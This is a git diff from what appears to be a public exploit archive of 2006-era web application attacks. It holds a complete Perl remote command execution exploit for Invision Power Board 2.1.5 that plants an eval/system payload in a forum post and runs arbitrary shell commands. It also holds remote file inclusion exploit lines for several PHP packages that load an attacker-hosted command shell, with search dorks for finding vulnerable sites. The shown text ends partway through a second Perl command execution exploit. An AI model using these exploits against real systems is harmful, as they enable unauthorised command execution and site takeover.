- 'errors'            => \$errors,
- 'debug'             => \$debug);
-
-my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/;
-print "Host: $host\nForum Index: $forum_index\n" if $debug;
-
-&help unless ($host);
-
-# w0w0w0w0w0 is smarter than some one i know :D
-if (!$lang) {
-       lang_autodetect();
-       print "Detected lang is: $lang_strings{'name'}\n" if $debug;
-}
-
-while (1){
-   print "invvy:\\> ";
-   my $cmd = <STDIN>;
-   &invvy($cmd);
-}
-
-sub invvy {
-       chomp (my $cmd = shift);
-       LWP::Debug::level('+') if $debug;
-
-       $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
-
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       ipb_login (); # This works with redirects enabled/disabled
-
-
-       ipb_post(); # Post in a main forum.
-
-       ipb_exec ($cmd);
-
-       ipb_delete ($forum_index, $topic_index);
-}
-# guglucitos team presents:
-
-sub help {
-   print "Syntax: ./$0 <url> [options]\n";
-   print "\t--ipb_user, --ipb_pass  (needed if dont allow anonymous posts)\n";
-   print "\t--proxy (http), --proxy_user, --proxy_pass\n";
-   print "\t--lang=[es|en] (default: autodetect)\n";
-   print "\t--debug\n";
-   print "\nExample\n";
-   print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n";
-   print "\n";
-   exit(1);
-}
-
-# sponsorized by coca-cola
-sub lang_autodetect {
-
-   my $req = HTTP::Request->new (GET => $host."/index.php");
-   $ua->proxy(['http'] => $proxy) if $proxy;
-   $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-   print $req->as_string() if $debug;
-
-   my $res = $ua->request($req);
-   my $html = $res->content();
-
-   if (($html =~ /Bienvenido,/) or  ($html =~ /Fecha y Hora actual/)) {
-               %lang_strings =  %lang_es;
-               return;
-   }
-   if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) {
-               %lang_strings = %lang_en;
-               return;
-   }
-   print "Unknown lang switching to default: 'english'\n";
-   %lang_strings =  %lang_en;
-}
-
-# login function for 2.1.5
-sub ipb_login {
-       my $content;
-       my $h = $host."/index.php?act=Login&CODE=01";
-       print $h . "\n" if $debug;
-       my $req = POST $h,[
-               'referer' => $host,
-               'UserName' => $ipb_user,
-               'PassWord' => $ipb_pass,
-               'CookieDate' => 1
-               ]; #grab these, and send to dsr!
-       print $req->as_string() if $debug;
-       my $res = $ua->request($req);
-       if ($errors) {
-               print "[+] Context: Login in\n";
-               print "HTTP Error code: ".$res->code()."\n";
-               print "HTTP Location: ".$res->header("Location")."\n";
-               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
-               print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n";
-       }
-       if ($res->code() eq 302) {
-               $content = redirect ($res->header("Location"));
-
-       } else {
-
-               $content = $res->content();
-       }
-
-       if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) {
-           print "Logged in\n" if $errors;
-       } else {
-          die "Can't log in\n";
-       }
-
-}
-
-sub redirect {
-   my ($addr) = @_;
-   my $req = HTTP::Request->new (GET => $addr);
-   $ua->proxy(['http'] => $proxy) if $proxy;
-   $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-   print $req->as_string() if $debug; # MKSINK is r0xer
-
-   my $res = $ua->request($req);
-   my $html = $res->content();
-
-   return $html;
-}
-
-sub ipb_post {
-       # This is for posting into a main index.
-
-       my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index;
-
-       my $req = HTTP::Request->new (GET => $h);
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       print $req->as_string() if $debug; #dirty_epic r0x++
-
-       my $res = $ua->request($req);
-       my $html = $res->content();
-
-       ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/;
-       ($post_key) = $html =~ m/post_key' value='(.*?)'/;
-
-       print "AUTH check: $md5_key\n" if $debug;
-       print "POST key: $post_key\n" if $debug;
-
-       $tmp_var = int(rand(31337));
-       my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei
-       $h = $host."/index.php";
-
-       print $h."\n" if $debug;
-
-       my $req = POST $h, [
-               'st' => 0,
-               'act' => "Post",
-               's' => '',
-               'f' => $forum_index,
-               'auth_key' => $md5_key,
-               'removeattachid' => 0,
-               'MAX_FILE_SIZE' => 51200000,
-               'CODE' => '01',
-               'post_key' => $post_key,
-               'TopicTitle' => '514 pwned',
-               'TopicDesc' => '',
-               'poll_question' => '',
-               'ffont' => 0,
-               'fsize' => 0,
-               'Post' => $exploitme,
-               'post_htmlstatus' => 0,
-               'enableemo' => 'yes',
-               'enablesig' => 'yes',
-               'mod_options' => 'nowt',
-               'iconid' => 0,
-               'dosubmit' => 'Post New Topic'
-               ];
-
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       print $req->as_string() if $debug;
-       my $res = $ua->request($req);
-       my $html = $res->content();
-
-       print "Location: ".$res->header("Location") if $debug;
-       ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/;
-       if ($errors) {
-               print "[+] Context: Creating post\n";
-               print "HTTP Error code: ".$res->code()."\n";
-               print "HTTP Location: ".$res->header("Location")."\n";
-               print "Topic Index: ".$topic_index."\n";
-               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
-               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
-       }
-
-}
-
-sub ipb_delete {
-       my ($fid, $tid) = @_;
-       my $req;
-       print "Deleting Topic: $tid from forum: $fid\n" if $debug;
-
-       my $h = $host."/index.php";
-       $req = POST $h, [
-                       'st' => 0,
-                       'act' => 'mod',
-                       'f' => $fid,
-                       'auth_key' => $md5_key,
-                       'CODE' => '08',
-                       't' => $tid,
-                       'submit' => 'Delete this topic'
-               ]; # fuck windows automatic reboot
-       print $req->as_string() if $debug;
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       my $res = $ua->request($req);
-
-       if ($errors) {
-               print "[+] Context: Deleting Topic\n";
-               print "HTTP Error code: ".$res->code()."\n";
-               print "HTTP Location: ".$res->header("Location")."\n";
-               print "Topic Index: ".$topic_index."\n";
-               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
-               print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n";
-       }
-       # yow yow
-       if ($res->code() eq 200) {
-                if ($res->content() =~ /$lang_strings{'deleted'}/) {
-                       print "Topic $topic_index deleted\n" if $errors;
-               } else {
-                       print "Maybe there was errors deleting post: $topic_index\n" if $errors;
-               }
-       }
-}
-
-# shhhhh this is hidden
-sub ipb_exec {
-       my ($cmd) = @_;
-       my $h = $host."/index.php?act=Search&CODE=01";
-       my $req = POST $h, [
-                       'keywords' => "HTTP_".$tmp_var,
-                       'namesearch' => '',
-                       'forums[]' => $forum_index,
-                       'prune' => 0,
-                       'prune_type' => 'newer',
-                       'result_type' => 'posts',
-                       'search_in' => 'posts',
-                       'sort_key' => 'last_post',
-                       'searchsubs' => '1'
-               ];
-       print $req->as_string() if $debug;
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       my $res = $ua->request($req);
-       my $html = $res->content();
-
-       my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/;
-       print "Redirect to: $redir\n" if $errors; # don't ask
-
-       if ($errors) {
-               print "[+] Context: First search\n";
-               print "HTTP Error code: ".$res->code()."\n";
-               print "HTTP Location: ".$res->header("Location")."\n";
-               print "Topic Index: ".$topic_index."\n";
-               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
-               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
-       }
-
-       if ($res->code eq 302) {
-               $redir = $res->header("Location");
-       }
-
-       # piere - tonite is a great song
-       my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00');
-       $ua->proxy(['http'] => $proxy) if $proxy;
-       $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL');
-       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-       print $req->as_string() if $debug;
-
-       my $res = $ua->request($req);
-       my $html = $res->content();
-
-       $html =~ m/STARTXPL(.*?)ENDXPL/s;
-       print $1."\n";
-
-       # no matter with you
-       if ($errors) {
-               print "[+] Context: Executed\n";
-               print "HTTP Error code: ".$res->code()."\n";
-               print "HTTP Location: ".$res->header("Location")."\n";
-               print "Topic Index: ".$topic_index."\n";
-               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
-               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
-       }
-
-}
-# be aware with la roca peoplee
-
-# milw0rm.com [2006-04-29]
+#!/usr/bin/perl
+# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es
+#
+# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept
+#
+# remote command execution. vuln credits goes to IceShaman.
+#
+# works only if you have perms to post a comment. Exploit with replye is
+# in my TODO...
+#
+# 514 still r0xing.
+# !dSR the hardc0re hax0rs ;)
+# There is no kwel comments in this release, wait for next upgrade
+#######################################################################/
+
+use LWP::UserAgent;
+use HTTP::Cookies;
+use LWP::Simple;
+use HTTP::Request::Common "POST";
+use HTTP::Response;
+use Getopt::Long;
+use strict;
+
+$| = 1; # ;1 = |$
+
+my ($proxy,$proxy_user,$proxy_pass,$lang);
+my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);
+my ($md5_key, $post_key, $tmp_var);
+
+my %lang_es = (
+       'name' => 'Spanish Language',
+       'login' => "Ahora estás identificado",
+       'incorrect' => "Nombre de usuario o contraseña incorrectos",
+       'deleted' => "Tema Eliminado"
+);
+
+my %lang_en = (
+       'name' => 'English language',
+       'login' =>  "You are now logged in",
+       'incorrect' => "Sorry, we could not find a member using those log in details",
+       'deleted'  => 'Topic Deleted',
+);
+my %lang_strings = ();
+
+my $ua = new LWP::UserAgent(
+           cookie_jar=> { file => "$$.cookie" });
+
+my $options = GetOptions (
+ 'host=s'            => \$arg_host,
+ 'proxy=s'           => \$proxy,
+ 'proxy_user=s'      => \$proxy_user,
+ 'proxy_pass=s'      => \$proxy_pass,
+ 'ipb_user=s'        => \$ipb_user,
+ 'ipb_pass=s'        => \$ipb_pass,
+ 'lang=s'            => \$lang,
+ 'errors'            => \$errors,
+ 'debug'             => \$debug);
+
+my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/;
+print "Host: $host\nForum Index: $forum_index\n" if $debug;
+
+&help unless ($host);
+
+# w0w0w0w0w0 is smarter than some one i know :D
+if (!$lang) {
+       lang_autodetect();
+       print "Detected lang is: $lang_strings{'name'}\n" if $debug;
+}
+
+while (1){
+   print "invvy:\\> ";
+   my $cmd = <STDIN>;
+   &invvy($cmd);
+}
+
+sub invvy {
+       chomp (my $cmd = shift);
+       LWP::Debug::level('+') if $debug;
+
+       $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
+
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       ipb_login (); # This works with redirects enabled/disabled
+
+
+       ipb_post(); # Post in a main forum.
+
+       ipb_exec ($cmd);
+
+       ipb_delete ($forum_index, $topic_index);
+}
+# guglucitos team presents:
+
+sub help {
+   print "Syntax: ./$0 <url> [options]\n";
+   print "\t--ipb_user, --ipb_pass  (needed if dont allow anonymous posts)\n";
+   print "\t--proxy (http), --proxy_user, --proxy_pass\n";
+   print "\t--lang=[es|en] (default: autodetect)\n";
+   print "\t--debug\n";
+   print "\nExample\n";
+   print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n";
+   print "\n";
+   exit(1);
+}
+
+# sponsorized by coca-cola
+sub lang_autodetect {
+
+   my $req = HTTP::Request->new (GET => $host."/index.php");
+   $ua->proxy(['http'] => $proxy) if $proxy;
+   $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+   print $req->as_string() if $debug;
+
+   my $res = $ua->request($req);
+   my $html = $res->content();
+
+   if (($html =~ /Bienvenido,/) or  ($html =~ /Fecha y Hora actual/)) {
+               %lang_strings =  %lang_es;
+               return;
+   }
+   if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) {
+               %lang_strings = %lang_en;
+               return;
+   }
+   print "Unknown lang switching to default: 'english'\n";
+   %lang_strings =  %lang_en;
+}
+
+# login function for 2.1.5
+sub ipb_login {
+       my $content;
+       my $h = $host."/index.php?act=Login&CODE=01";
+       print $h . "\n" if $debug;
+       my $req = POST $h,[
+               'referer' => $host,
+               'UserName' => $ipb_user,
+               'PassWord' => $ipb_pass,
+               'CookieDate' => 1
+               ]; #grab these, and send to dsr!
+       print $req->as_string() if $debug;
+       my $res = $ua->request($req);
+       if ($errors) {
+               print "[+] Context: Login in\n";
+               print "HTTP Error code: ".$res->code()."\n";
+               print "HTTP Location: ".$res->header("Location")."\n";
+               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+               print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n";
+       }
+       if ($res->code() eq 302) {
+               $content = redirect ($res->header("Location"));
+
+       } else {
+
+               $content = $res->content();
+       }
+
+       if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) {
+           print "Logged in\n" if $errors;
+       } else {
+          die "Can't log in\n";
+       }
+
+}
+
+sub redirect {
+   my ($addr) = @_;
+   my $req = HTTP::Request->new (GET => $addr);
+   $ua->proxy(['http'] => $proxy) if $proxy;
+   $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+   print $req->as_string() if $debug; # MKSINK is r0xer
+
+   my $res = $ua->request($req);
+   my $html = $res->content();
+
+   return $html;
+}
+
+sub ipb_post {
+       # This is for posting into a main index.
+
+       my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index;
+
+       my $req = HTTP::Request->new (GET => $h);
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       print $req->as_string() if $debug; #dirty_epic r0x++
+
+       my $res = $ua->request($req);
+       my $html = $res->content();
+
+       ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/;
+       ($post_key) = $html =~ m/post_key' value='(.*?)'/;
+
+       print "AUTH check: $md5_key\n" if $debug;
+       print "POST key: $post_key\n" if $debug;
+
+       $tmp_var = int(rand(31337));
+       my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei
+       $h = $host."/index.php";
+
+       print $h."\n" if $debug;
+
+       my $req = POST $h, [
+               'st' => 0,
+               'act' => "Post",
+               's' => '',
+               'f' => $forum_index,
+               'auth_key' => $md5_key,
+               'removeattachid' => 0,
+               'MAX_FILE_SIZE' => 51200000,
+               'CODE' => '01',
+               'post_key' => $post_key,
+               'TopicTitle' => '514 pwned',
+               'TopicDesc' => '',
+               'poll_question' => '',
+               'ffont' => 0,
+               'fsize' => 0,
+               'Post' => $exploitme,
+               'post_htmlstatus' => 0,
+               'enableemo' => 'yes',
+               'enablesig' => 'yes',
+               'mod_options' => 'nowt',
+               'iconid' => 0,
+               'dosubmit' => 'Post New Topic'
+               ];
+
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       print $req->as_string() if $debug;
+       my $res = $ua->request($req);
+       my $html = $res->content();
+
+       print "Location: ".$res->header("Location") if $debug;
+       ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/;
+       if ($errors) {
+               print "[+] Context: Creating post\n";
+               print "HTTP Error code: ".$res->code()."\n";
+               print "HTTP Location: ".$res->header("Location")."\n";
+               print "Topic Index: ".$topic_index."\n";
+               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
+       }
+
+}
+
+sub ipb_delete {
+       my ($fid, $tid) = @_;
+       my $req;
+       print "Deleting Topic: $tid from forum: $fid\n" if $debug;
+
+       my $h = $host."/index.php";
+       $req = POST $h, [
+                       'st' => 0,
+                       'act' => 'mod',
+                       'f' => $fid,
+                       'auth_key' => $md5_key,
+                       'CODE' => '08',
+                       't' => $tid,
+                       'submit' => 'Delete this topic'
+               ]; # fuck windows automatic reboot
+       print $req->as_string() if $debug;
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       my $res = $ua->request($req);
+
+       if ($errors) {
+               print "[+] Context: Deleting Topic\n";
+               print "HTTP Error code: ".$res->code()."\n";
+               print "HTTP Location: ".$res->header("Location")."\n";
+               print "Topic Index: ".$topic_index."\n";
+               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+               print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n";
+       }
+       # yow yow
+       if ($res->code() eq 200) {
+                if ($res->content() =~ /$lang_strings{'deleted'}/) {
+                       print "Topic $topic_index deleted\n" if $errors;
+               } else {
+                       print "Maybe there was errors deleting post: $topic_index\n" if $errors;
+               }
+       }
+}
+
+# shhhhh this is hidden
+sub ipb_exec {
+       my ($cmd) = @_;
+       my $h = $host."/index.php?act=Search&CODE=01";
+       my $req = POST $h, [
+                       'keywords' => "HTTP_".$tmp_var,
+                       'namesearch' => '',
+                       'forums[]' => $forum_index,
+                       'prune' => 0,
+                       'prune_type' => 'newer',
+                       'result_type' => 'posts',
+                       'search_in' => 'posts',
+                       'sort_key' => 'last_post',
+                       'searchsubs' => '1'
+               ];
+       print $req->as_string() if $debug;
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       my $res = $ua->request($req);
+       my $html = $res->content();
+
+       my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/;
+       print "Redirect to: $redir\n" if $errors; # don't ask
+
+       if ($errors) {
+               print "[+] Context: First search\n";
+               print "HTTP Error code: ".$res->code()."\n";
+               print "HTTP Location: ".$res->header("Location")."\n";
+               print "Topic Index: ".$topic_index."\n";
+               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
+       }
+
+       if ($res->code eq 302) {
+               $redir = $res->header("Location");
+       }
+
+       # piere - tonite is a great song
+       my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00');
+       $ua->proxy(['http'] => $proxy) if $proxy;
+       $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL');
+       $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+       print $req->as_string() if $debug;
+
+       my $res = $ua->request($req);
+       my $html = $res->content();
+
+       $html =~ m/STARTXPL(.*?)ENDXPL/s;
+       print $1."\n";
+
+       # no matter with you
+       if ($errors) {
+               print "[+] Context: Executed\n";
+               print "HTTP Error code: ".$res->code()."\n";
+               print "HTTP Location: ".$res->header("Location")."\n";
+               print "Topic Index: ".$topic_index."\n";
+               my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+               print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
+       }
+
+}
+# be aware with la roca peoplee
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1727.txt b/platforms/php/webapps/1727.txt
index d6a14fe55..c184c3fc0 100755
--- a/platforms/php/webapps/1727.txt
+++ b/platforms/php/webapps/1727.txt
@@ -1,8 +1,8 @@
-Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
-URL: http://www.openphpnuke.com/
-Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
-Credits: [Oo]
-
-Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
+URL: http://www.openphpnuke.com/
+Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
+Credits: [Oo]
+
+Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1728.txt b/platforms/php/webapps/1728.txt
index c91d4fde8..81d10da7e 100755
--- a/platforms/php/webapps/1728.txt
+++ b/platforms/php/webapps/1728.txt
@@ -1,8 +1,8 @@
-Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
-URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
-Dork: "Powered by Knowledge Base"
-Credits: [Oo]
-
-Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
+URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
+Dork: "Powered by Knowledge Base"
+Credits: [Oo]
+
+Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1729.txt b/platforms/php/webapps/1729.txt
index 900161612..5d4077bf7 100755
--- a/platforms/php/webapps/1729.txt
+++ b/platforms/php/webapps/1729.txt
@@ -1,8 +1,8 @@
-Title: Limbo CMS <= 1.04 Remote File Inclusion
-URL: http://www.limbo-cms.com/
-Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
-Credits: [Oo]
-
-Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: Limbo CMS <= 1.04 Remote File Inclusion
+URL: http://www.limbo-cms.com/
+Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
+Credits: [Oo]
+
+Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1730.txt b/platforms/php/webapps/1730.txt
index 63319e42e..6d4359127 100755
--- a/platforms/php/webapps/1730.txt
+++ b/platforms/php/webapps/1730.txt
@@ -1,7 +1,7 @@
-Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
-URL: http://www.aardvarktopsitesphp.com/
-Dork: "Powered By Aardvark Topsites PHP 4.2.2"
-
-Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-30]
+Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
+URL: http://www.aardvarktopsitesphp.com/
+Dork: "Powered By Aardvark Topsites PHP 4.2.2"
+
+Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-30]
diff --git a/platforms/php/webapps/1731.txt b/platforms/php/webapps/1731.txt
index a211e9855..b288d483f 100755
--- a/platforms/php/webapps/1731.txt
+++ b/platforms/php/webapps/1731.txt
@@ -1,19 +1,19 @@
-Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: phpMyAgenda
-URL: http://phpmyagenda.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "Powered by phpMyAgenda"
------------------------------------------------------------------
-
-Exploitation:
-
-/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
-/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
-
-# milw0rm.com [2006-04-30]
+Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: phpMyAgenda
+URL: http://phpmyagenda.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "Powered by phpMyAgenda"
+-----------------------------------------------------------------
+
+Exploitation:
+
+/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
+/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
+
+# milw0rm.com [2006-04-30]
diff --git a/platforms/php/webapps/1732.pl b/platforms/php/webapps/1732.pl
index 99bb72c32..d0fd7bc59 100755
--- a/platforms/php/webapps/1732.pl
+++ b/platforms/php/webapps/1732.pl
@@ -1,94 +1,94 @@
-#!/usr/bin/perl
-#
-# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit
-#
-# Copyright (c) 2006 cijfer <cijfer@netti!fi>
-# All rights reserved.
-#
-# never ctrl+c again.
-# cijfer$ http://target.com/dir
-# host changed to 'http://target.com/dir'
-# cijfer$ 
-#
-# to set your PHP shell location:
-# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd=
-# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='
-# cijfer$
-#
-# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $
-
-use strict;
-use LWP::UserAgent;
-use URI::Escape;
-use Getopt::Long;
-use Term::ANSIColor;
-
-my($command,$verbose,$proxy,$shell,$host,$res);
-
-$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
-&usage unless $host;
-
-while()
-{
-	print color("green"), "cijfer\# ", color("reset");
-	chomp($command = <STDIN>);
-	exit unless $command;
-	if($command =~ m/^http:\/\/(.*)/g)
-	{
-		$host="http://".$1;
-		print "host changed to '";
-		print color("bold"), $host."'\n", color("reset");
-	}
-	elsif($command =~ m/^shell=http:\/\/(.*)/g)
-	{
-		$shell="http://".$1;
-		print "php shell set to '";
-		print color("bold"), $shell."'\n", color("reset");
-	}
-	else
-	{
-		&exploit($command,$host);
-	}
-}
-
-sub usage
-{
-	print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n";
-	print "usage: $0 -hpv\n\n";
-	print "  -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n";
-	print "  -p, --proxy\t\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
-	print "  -v, --verbose\t\tverbose mode (debug)\n\n";
-	exit;
-}
-
-sub exploit
-{
-	my($command,$host) = @_;
-	my($string,$execut,$recv,$sent,$out,$cij,@cij);
-
-	$cij=LWP::UserAgent->new() or die;
-	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
-	$cij->proxy("http", "http://".$proxy."/") unless !$proxy;
-
-	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20";
-	$string .= uri_escape(shift);
-	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";
-
-	$out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string);
-
-	if($out->is_success)
-	{
-		@cij=split("_cijfer_",$out->content);
-		print substr(@cij[1],1);
-	}
-
-	if($verbose)
-	{
-		$recv=length $out->content;
-		print "Total received bytes: ".$recv."\n";
-		$sent=length $command;
-		print "Total sent bytes: ".$sent."\n";
-	}
-}
-
-# milw0rm.com [2006-04-30]
+#!/usr/bin/perl
+#
+# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit
+#
+# Copyright (c) 2006 cijfer <cijfer@netti!fi>
+# All rights reserved.
+#
+# never ctrl+c again.
+# cijfer$ http://target.com/dir
+# host changed to 'http://target.com/dir'
+# cijfer$ 
+#
+# to set your PHP shell location:
+# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd=
+# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='
+# cijfer$
+#
+# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $
+
+use strict;
+use LWP::UserAgent;
+use URI::Escape;
+use Getopt::Long;
+use Term::ANSIColor;
+
+my($command,$verbose,$proxy,$shell,$host,$res);
+
+$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
+&usage unless $host;
+
+while()
+{
+	print color("green"), "cijfer\# ", color("reset");
+	chomp($command = <STDIN>);
+	exit unless $command;
+	if($command =~ m/^http:\/\/(.*)/g)
+	{
+		$host="http://".$1;
+		print "host changed to '";
+		print color("bold"), $host."'\n", color("reset");
+	}
+	elsif($command =~ m/^shell=http:\/\/(.*)/g)
+	{
+		$shell="http://".$1;
+		print "php shell set to '";
+		print color("bold"), $shell."'\n", color("reset");
+	}
+	else
+	{
+		&exploit($command,$host);
+	}
+}
+
+sub usage
+{
+	print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n";
+	print "usage: $0 -hpv\n\n";
+	print "  -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n";
+	print "  -p, --proxy\t\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
+	print "  -v, --verbose\t\tverbose mode (debug)\n\n";
+	exit;
+}
+
+sub exploit
+{
+	my($command,$host) = @_;
+	my($string,$execut,$recv,$sent,$out,$cij,@cij);
+
+	$cij=LWP::UserAgent->new() or die;
+	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
